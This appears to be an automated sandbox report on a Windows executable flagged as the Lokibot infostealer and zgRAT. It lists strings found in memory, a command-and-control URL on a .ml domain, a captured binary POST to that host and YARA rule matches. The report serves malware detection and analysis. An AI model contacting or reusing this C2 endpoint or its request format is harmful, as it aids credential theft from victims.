Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G3G2LTU6xT1dIa75ZTBrzQ3h%2FkMs8SMZZVyD0xE1mwxPV4oI%2BfTWjwL5TflyLYScrVSEauIaxgoYCV%2FBM%2FCPSBliFp2pqJ19qnMpTine9wUNMJDhTCncN7VkkcyhtHihTI3nXhGGS1Gq8UwVROle%2FFD%2FHSXb6NWl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921b3efe7695e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G7ZsxWumLaKED6%2BYuJWBrIh6SR%2BiN8pmPfmg9yBLW2iVPcopZ2CEw5GBgS%2FPH%2BvFaKHJG1ZhsaNmrCIukGN2NfbXxJbYUox2BZVWmSnfiajX4SxZFxwhEYISY4TRGqJlkk0kdngAog6gZn1o0s7j%2F7r%2FdI0SN3Ef"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921becb2e916e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uJ2aFj%2FLxcIdQjIzKvG1YFZWmuKbjRzrGOHigFeW%2F0gfHpqz94T%2B9jaeJDSMrGYwGhuqVsxvVTKhQAbqcEuUgxy8i4guLWtU6nxuKttnFEDoMWzKPhiOGY%2FYUQRR6esACpT93Q9%2B6uAsTOB5hX2Nsddc%2FdtdviGR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921c78d7d9b31-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CZCSVxti0SgA80WOzuEVPjdcUv50IHeySFN3l6uLlOqZe8AfRLBStR5csKteHUIWWBOCTCbfPNtFYFoP%2FBn0c5gW2GfI5fwpllAlrj58KRxYEFc9iOWoT0XTo3JoqqDiFCqslIKiZ13kLfi5MPgGXpwTzNPNndMl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921cffb62915c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R2tnouE8fC1OzBx8aEG%2BibOKpZ%2Bf0U37UTiFX2OSnZFaYDM%2BH%2F28UwnLOeCq7iFzTYUqOr%2B3dUX8hePJZHjsUuOLp%2FIyX8%2Ffh49iF0iEZ7OhqGhGduzQ%2BHQ9EWq4QhhwDcu9P3YO4cAen8t1qZP%2FMw2tuq0ONJpL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921d93e609170-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LIjFWBJTliMzhKaPKdlIAjNfzDzF8n4eUmujo7eXscM72m6%2BPHkx7ZzKQ134WTCVMed8yE2z4cKUp4NTu96TfiX7mpes5aC9tm6y%2Ftk%2FWWKpeairLIh8s03nuVB95bJnduruh2ku2ayW29uejjni8WifuuYbQGk2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921e37c369b5e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wzvt8Oxf3apHGM86JoNVTJ9Zl094cuQkxanzM6QHknqiFP9xkEnZ1EzDR6mQXgALOLv8UuM0ILGd26zz2%2BjC2rd%2B9u9dPvj9s1k8p4B8437tdRYW3zKq8oPJA8wkIvxG0kthqpZQG4u0QYKFvThjSlFuPea1LMTH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921ed8f73695e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sDApajoeuGLlKNOy%2F3JHZ9gaRm59K7%2FvdsaUznF5Rimxf1lT7NXq31nWEGPBh2lJ3PSUwkmpXc%2BWo%2FywuEQa3CE2iAcOsQAXc6WOp0StFcy7ktCqKE7F%2BmnKQ%2BRUCc2F6qiPeZXKvhC0OUxsEvjTqPOcLoAZiCo0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921f6ba759232-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qkr3peN44f4yiecLrOo19VUN7WuLignZRc3prj%2F0wCXHN4z4ht2E2SViYKaXKBvsmPbEaz2qEjaaWSNv69HaN9mqwIg8OTSotBfRHXWP9BL8IIrruUCQvZ%2FoSfuhCOjrNCXQz7fCIpA8RTHPO8XceYoYtfCAZxy4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718922032a249b67-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TDXXK0zHeD4APIk0H5z6ru%2FAukzSNKnYXzfSqVMsNrM2ILCHNXrHtMLwv6KZWsXIY6sB5zZYj4dORXoDkGfYu1Vw48vFAga1yTSq0qHfcHDu4heJxHAai3VEHtKnRi6T40pm6qPlcPLB7D72iEAR1FNZnI0hpG43"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718922164f899a0f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KUc4QnyTCy5MFbFiUmBZJ%2FeciYG41%2FR4sFYEdMYMcKRnNflJ3ciOhO4Qe%2BVxcLbHX1TX0gwLAO8DUSonXw2PQZTQwEGcZAcXVxz43HVjrahJb2Vaw7aKO%2BhiqVDVTsYCEoDxd0j439xiIq3%2BMQ0mv%2FpyviY3jyjS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71892227fc439b3f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LSprzcntTNi%2F5iEENCb5rMe9er58Bid7mIAEPw57AoFa5UegKCPU0WnZ1w8w0Ih%2Fpp3JFaCjyPwMGdw6UrUNJO6Ah5J79YPm1%2BGquvY72ji0gB94kxfKdfBSPVmcKq4vcL5oeIdrF4eSwb%2F3XiRJAKqkIwue8qPq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718922399c558fe8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r0SVCd1aYAL6UnN7kzC9kSKCpRIc2QlMm6uEDvMRg9KzKi1NjHwwa%2FuotvsZaR%2FvIpdZGiL%2BL7buVgBrTTkE3JHyNk3svlvfY6UniqSEORDAlzLcFYMcfe99BKAx4u9klmRvHXU6e0KmBGNjsfSMvzeg1YT5%2BFsE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71892245c89c9217-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3qVDcRUABdl1jxhpLhwSZbhAfOoeZHRuBM0ZRi7ug5vnbxTChD%2FKYZSMrr6pnYmUNjQnsWX1jbFgP0WYdc0TK9xieQiSDt7gnYLXn15ZxhN%2FRpZn2yADxpjEuOeV9qJx93y29%2BW6ygHoQr7dGIyxIAI2AQpXyaV8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189224db90a6919-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3cXCQ1sYsTaywZlxmhZSkvs85xjKQxR5Pb3Swf1U4aHr1VG9mnFMvZTr5YAzokKPMDNCSCbBfEvUfiNMyV5Fx7v2C9VzwIAeE8z45qw05Bjb%2FV8Wbi%2BencNN9fAMiy%2Bumzk2pJgtz%2Fq8v2OtqxX%2BSkSiSjP3TAi6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718922567ac29bfe-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IjUoZM1m0%2FKH1UL5UdNQdTQdop%2Fl3pJfEVUm7ELrs9HHHizfoar8GLPuFD6WHcBwijHHUjXNu2B9H7mpr5kuNm02hSxptILPrYj%2BLt6%2Bd%2BVpEzo7DeXclLol71P8AkbdbyG5E9Ete69UAQhnk9hh8zIFr5yr%2FIti"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71892261d93f904f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1Gtbc6oxwMDp6V6YwPHeErViD%2FUnK3oUOLrX7ei7A%2BKDcCKAb2q9MsDAjeTIAXbZI%2FbgdNWVZP8zTO%2BHOeHuGDzyPTivJ12UYURQgTcizY35SnFjIKO%2FEukKwk9mPJZgGkBW2WS8pOYRN8iPD3CgYG0k77aHnMee"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71892269fbed912a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f%2Bhr9k9VS6Sgac5o8jUx7xbpN1Z7Fcsd0JIgG7qeuu%2FIySRQCPveUmsLdaRUxPhiNkgvTyzFaQU5sfEWnYigE7eCNcr9QzX3eah7yfn5wCQuJhQ44zTgpin0AM5KCU86P%2FeezQn4XgtEESHlso4AP4H7wJB5skAS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718922719f506961-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wsMD7VEqGSudLPodNYQtoLTtXDHBhUbxcHIzl19sNYUwLTNRKDWvrtQV%2Fg3ZKexiM4SKunaqMzdpIMZl4OSseJErjHh%2BFObqqb%2Ftd6Cko3heLRa5ou%2BKxzy73oMRmYhSsW9Ii67jRMbt%2B2I7qFCDpDmQhqsdQQUA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189227f1ab99b6a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:20:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p%2FefmyEcaSbXrWN8R%2BSwGavmj3iobA00Fe%2FI4YPdZQVvCf8ELOXyH7Or4LtRHtLj4%2BNA0FEtt6S120z6pPFHdoAfyJ1x8MA56CHvo2jO2L2tlnnuF8aBX842dU%2FXqdXjFLIQ2nHtvfM%2BHgX4hnHbt8ZDCfca2lrN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189228b5dfc9bc2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: ZciowjM9hN.exe, 00000009.00000002.545669843.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000009.00000003.473720626.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000009.00000003.469970256.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000009.00000003.400879586.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000009.00000002.544825062.000000000049F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
Source: ZciowjM9hN.exe, 00000009.00000003.473720626.00000000016BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.phpv
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ZciowjM9hN.exe, ZciowjM9hN.exe, 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ZciowjM9hN.exe, 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ZciowjM9hN.exe, 00000000.00000002.323134179.0000000006C82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown

HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 190Connection: close

Source: unknown

DNS traffic detected: queries for: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Code function: 9_2_00404ED4 recv,

9_2_00404ED4

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ZciowjM9hN.exe.7470000.9.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.ZciowjM9hN.exe.3d39ed0.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
